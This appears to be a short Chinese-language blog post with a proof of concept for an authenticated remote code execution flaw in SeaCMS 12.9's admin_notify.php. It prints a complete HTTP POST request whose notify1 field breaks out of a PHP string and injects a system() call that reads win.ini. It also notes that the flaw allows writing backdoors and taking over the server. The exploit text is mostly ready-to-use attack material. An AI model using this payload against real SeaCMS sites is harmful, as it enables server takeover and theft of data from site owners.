Pages

Menu

Babing
Published on 2024-08-30 / 2 Visits
0
0

X8-2海洋-CMS-RCE

#Pocs

X8-2海洋-CMS-RCE

漏洞描述:

海洋CMS admin_notify.php 接口处存在远程代码执行漏洞,经过身份验证的远程攻击者可利用该漏洞执行任意代码,写入后门文件,进而控制整个web服务器。

影响版本:

SeaCMS 12.9

网站图片:

网站图片

漏洞复现:

payload:

POST /SeaCMS_12.9/Upload/pwh4pc/admin_notify.php?action=set HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Priority: u=1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Referer: http://127.0.0.1/SeaCMS_12.9/Upload/pwh4pc/admin_notify.php
Sec-Fetch-Dest: document
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: PHPSESSID=8h9dt1md0b4ppcvdrjn64kfsum
Sec-Fetch-Site: same-origin
Upgrade-Insecure-Requests: 1
Sec-Fetch-Mode: navigate
Origin: http://127.0.0.1
Accept-Encoding: gzip, deflate, br, zstd

notify1=1";system("type C:\Windows\win.ini");;//&notify2=2&notify3=3

效果图:
效果图
PS:后台漏洞,有后台权限的可以打, 执行后会有一个保存设置的过程然后页面跳转,需再次请求页面,查看命令执行结果,也可以使用浏览器插件一步到位,如下:
效果图:
效果图

X8-4海洋-CMS-RCE
X8-1行云海-CMS-SQL

Comment